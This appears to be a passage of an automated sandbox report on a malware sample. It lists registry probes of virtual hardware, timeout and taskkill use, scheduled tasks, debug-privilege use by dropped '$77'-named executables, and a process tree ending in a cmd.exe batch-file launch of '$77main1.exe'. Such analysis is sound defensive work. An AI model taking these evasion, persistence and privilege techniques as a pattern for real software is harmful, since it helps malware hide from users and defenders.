| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 07 Oct 2024 10:40:09 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1728297608" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"
C:\Users\$77main1.exe
"C:\Users\$77main1.exe" 0
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat C:\Users\$77main1.exe 0"
